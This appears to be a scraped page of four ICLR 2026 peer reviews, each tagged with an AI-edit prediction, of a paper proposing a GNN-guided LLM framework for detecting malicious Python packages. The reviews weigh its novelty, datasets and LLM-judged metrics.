ICLR 2026 - Reviews

Submissions Reviews

Reviews

EditLens Prediction: Fully AI-generated Heavily AI-edited Moderately AI-edited Lightly AI-edited Fully human-written All

Rating: 1 2 3 4 5 6 7 8 9 10 All

Confidence: 1 2 3 4 5 All

Summary Statistics

EditLens Prediction	Count	Avg Rating	Avg Confidence	Avg Length (chars)
Fully AI-generated	2 (50%)	6.00	4.00	3721
Heavily AI-edited	1 (25%)	4.00	3.00	1804
Moderately AI-edited	1 (25%)	4.00	2.00	805
Lightly AI-edited	0 (0%)	N/A	N/A	N/A
Fully human-written	0 (0%)	N/A	N/A	N/A
Total	4 (100%)	5.00	3.25	2513

Title	Ratings	Review Text	EditLens Prediction
How Can LLMs Serve as Experts in Malicious Code Detection? A Graph Representation Learning Based Approach	Soundness: 3: good Presentation: 3: good Contribution: 3: good Rating: 6: marginally above the acceptance threshold Confidence: 4: You are confident in your assessment, but not absolutely certain. It is unlikely, but not impossible, that you did not understand some parts of the submission or that you are unfamiliar with some pieces of related work.	This paper proposes GMILLM, a novel framework that enhances the capability of Large Language Models (LLMs) in detecting malicious code by integrating graph representation learning. The key idea is to use a Graph Neural Network (GNN) trained on code graphs to identify critical code regions that are most likely malicious. These regions then guide the LLM’s attention, enabling it to focus on suspicious subgraphs rather than processing entire codebases. This approach effectively mitigates LLMs' limitations in handling large-scale and complex code dependencies. The authors validate their method on both public datasets and a newly constructed MalCP dataset, demonstrating superior performance in detection accuracy, interpretability, and computational efficiency compared to existing LLM-based and rule-based tools. Novel Framework: The integration of GNN for attention guidance and LLM for fine-grained analysis is innovative and well-executed. Comprehensive Evaluation: Extensive experiments across multiple datasets, model sizes, and metrics (accuracy, token efficiency, explainability) provide strong empirical evidence. Practical Relevance: The method significantly reduces computational cost while improving detection performance, making it suitable for real-world deployment. Reproducibility: The paper includes detailed prompts, dataset construction procedures, and code release, facilitating replication and extension. Language Scope: The method is currently evaluated only on Python code. While justified, it limits generalizability to other languages. Baseline Diversity: Although multiple tools are compared, some recent LLM-based security detection methods (e.g., MalPaCA, CodeBERT-based detectors) are not included. Rule Generation Dependency: The rule generation via LLM, while automated, may inherit biases or limitations of the underlying LLM used for rule synthesis. Generalizability: Have the authors considered applying GMILLM to other programming languages (e.g., JavaScript, C++)? If so, what adaptations would be necessary? Rule Robustness: How sensitive is the performance to the quality of the automatically generated rules? Could manually curated rules further improve results? Real-World Deployment: How does the system handle adversarial code obfuscation or evasion techniques not seen during training? Ablation Study: Could the authors provide an ablation on the contribution of the GNN component vs. the LLM component in the final performance?	Fully AI-generated
How Can LLMs Serve as Experts in Malicious Code Detection? A Graph Representation Learning Based Approach	Soundness: 2: fair Presentation: 3: good Contribution: 2: fair Rating: 6: marginally above the acceptance threshold Confidence: 4: You are confident in your assessment, but not absolutely certain. It is unlikely, but not impossible, that you did not understand some parts of the submission or that you are unfamiliar with some pieces of related work.	The paper asks why LLMs underperform professional tools on malicious Python package detection and proposes GMLLM, a two-stage framework that (i) builds a code graph for a package (AST + dependencies + call graph), extracts node features via LLM-generated sensitive-behavior rules, and trains a GNN for coarse binary detection, then (ii) explains the GNN prediction by optimizing edge/feature masks to get high-attention subgraphs, which are finally sent to an LLM for focused, high-precision analysis. This is meant to solve the “LLM pays for irrelevant code” problem by feeding only suspicious slices to the LLM. On four datasets (Backstabbers, Datadog, Mal-OSS, and their new MalCP), GMLLM (especially with GPT-4o as backend) reports higher recall/precision/accuracy than both raw LLMs and rule/ML tools, while using far fewer tokens because it prunes benign code first. Originality: Clear decomposition of the task into coarse structural suspicion (GNN) and fine semantic judgment (LLM), with an explicit mask-optimization “explainer” to turn the GNN into an attention generator for the LLM. This is a clean answer to “how can LLMs serve as experts” on large codebases. Quality: The method is fully specified: graph construction from all .py files, LLM-generated rule sets $S_{comm}, S_{data}$ GCN trained with cross-entropy (Eq. 1), per-sample mask optimization (Eqs. 2–8) to get node/edge attention, and thresholding to build the LLM input (Eq. 11). The objective combines prediction, sparsity, and entropy, which is standard for explanation-style masking. Results on public and custom data consistently show gains, and token-usage analysis backs the efficiency claim. Clarity: The pipeline in Fig. 2 is easy to follow; the explanation loss is written down in detail; examples of the final LLM input are shown. The four RQs in Section 4 map cleanly to the experiments. Significance: If the MalCP dataset is as large/diverse as described, a practical recipe for “GNN filters, LLM inspects” on PyPI-style malware is useful for software-supply-chain security, because it directly tackles scalability and cost. - LLM-generated rules are both features and supervision hints. The feature vector $h_v$ is a multi-hot over rules that are themselves produced by an LLM from the same general capability the method is trying to “enhance.” This risks circularity: performance may partly reflect how good the LLM was at rule generation, not how good the GMLLM pipeline is. A baseline with only human/common rules $S_{comm}$ is missing. - Per-sample mask optimization can be expensive and brittle. The attention extraction optimizes masks $M_j^{edge}, M_j^{feat}$ for each graph to keep only structures that keep the sample malicious (Eqs. 5–8). This is essentially running an explainer at inference time; real-world deployment on large PyPI/OSS feeds may make this step a bottleneck, and the paper does not profile this cost. - Evaluation has a “LLM judges LLM” component. The description-quality metrics in Table 3 are LLM-evaluated, and GMLLM uses LLM-produced inputs, so there is a risk of favorable bias. The paper should also show human or tool-based adjudication on a subset. - Generality is narrower than it sounds. Everything is built around Python (AST, package layout, PyPI-style attacks); it is not obvious that the same rule-extraction and masking will work unchanged for, say, obfuscated JS/npm malware or mixed-language repos. Yet the introduction frames it as “LLMs in software security.” - Comparisons to strong non-LLM ML baselines look close. On some datasets, tools like MPHunter/Ea4mp are already very strong, and GMLLM wins mainly when paired with GPT-4o; the Llama-3 version is notably weaker, suggesting the final gain depends a lot on the downstream LLM quality. 1- How sensitive is the method to the number and quality of LLM-generated rules in $S_{data}$? If we only use 10% of data to generate rules, does performance plateau or keep growing? An ablation on rule-set size would clarify whether LLM rule generation is a bottleneck. 2- The mask loss (Eq. 8) is optimized per sample. What is the average time/number of gradient steps per project for large MalCP packages, and is it done online or cached? Without this, it is hard to assess the “practical deployment” claim. 3- In Eq. (11), you threshold both nodes and edges. How are $\gamma_{node}$ and $\gamma_{edge}$ chosen, and are they the same across datasets? Detection quality may be quite sensitive to these values. 4- For Table 2, the Large subset is where baselines struggle. Are the same GNN parameters used across all three sizes, or is the GNN retrained per subset? If re-trained, we should be explicit about that to avoid accidental data-size leakage. 5- Since you say code and data are in the supplementary materials, do you also release the exact prompts for $S_{comm}$, $S_{data}$, and $\rho_{ana}$? Reproducibility of the whole pipeline depends on those.	Fully AI-generated
How Can LLMs Serve as Experts in Malicious Code Detection? A Graph Representation Learning Based Approach	Soundness: 3: good Presentation: 3: good Contribution: 2: fair Rating: 4: marginally below the acceptance threshold Confidence: 3: You are fairly confident in your assessment. It is possible that you did not understand some parts of the submission or that you are unfamiliar with some pieces of related work. Math/other details were not carefully checked.	This paper proposes GMLLM, a hybrid framework combining Graph Neural Networks (GNNs) and Large Language Models (LLMs) for malicious code detection. The method first trains a lightweight GNN on graph-structured code representations to localize potentially malicious segments, which are then further analyzed by an LLM. Experiments on multiple datasets, including a newly constructed MalCP dataset, demonstrate substantial performance improvements and significant token efficiency. 1. The GNN-guided attention mechanism is conceptually sound and effectively reduces computational costs. 2. Experiments are thorough, covering public and custom datasets with convincing results. But, the metrics such as “Threat Generality,” “Evidence Groundedness,” and “Factual Alignment” appear LLM-evaluated. This introduces circularity: an LLM model evaluates another LLM’s output. Independent human or tool-based assessments would provide stronger validity. And, the MalCP dataset’s construction details are only briefly discussed. Are malicious labels derived from ground-truth CVEs, dynamic execution, or heuristic rules? How balanced are the samples across package size and attack type? Is there contamination from public repositories used to pretrain LLMs? These factors critically affect generalization and could explain part of the performance gains. The paper introduces metrics such as Threat Generality, Evidence Groundedness, and Factual Alignment, which appear to rely on LLM-based judgments. Could the authors clarify how these metrics are computed and whether human or external validation was conducted? Using an LLM to evaluate another LLM introduces circularity and potential bias—please discuss how this limitation was mitigated and whether inter-rater reliability with human evaluators was measured.	Heavily AI-edited
How Can LLMs Serve as Experts in Malicious Code Detection? A Graph Representation Learning Based Approach	Soundness: 3: good Presentation: 3: good Contribution: 2: fair Rating: 4: marginally below the acceptance threshold Confidence: 2: You are willing to defend your assessment, but it is quite likely that you did not understand the central parts of the submission or that you are unfamiliar with some pieces of related work. Math/other details were not carefully checked.	This paper proposes a method that constructs a graph representation of code, and trains a graph neural network (GNN) with minimally labeled data to address challenges in detecting malicious code in large language models. They investigated an interesting and practical problem and provided a viable solution. 1. The methodological justification should be clarified. For instance, the rationale for employing a GNN and its specific role within the proposed framework should be explicitly explained. 2. How is the utility evaluated, and what is the performance of the code after handling code detection? 3. How do the results compare with other works discussed in the related work section? 4. In the experimental section, the detailed sizes or configurations of the models should be provided. see Weaknesses.	Moderately AI-edited

PreviousPage 1 of 1 (4 total rows)Next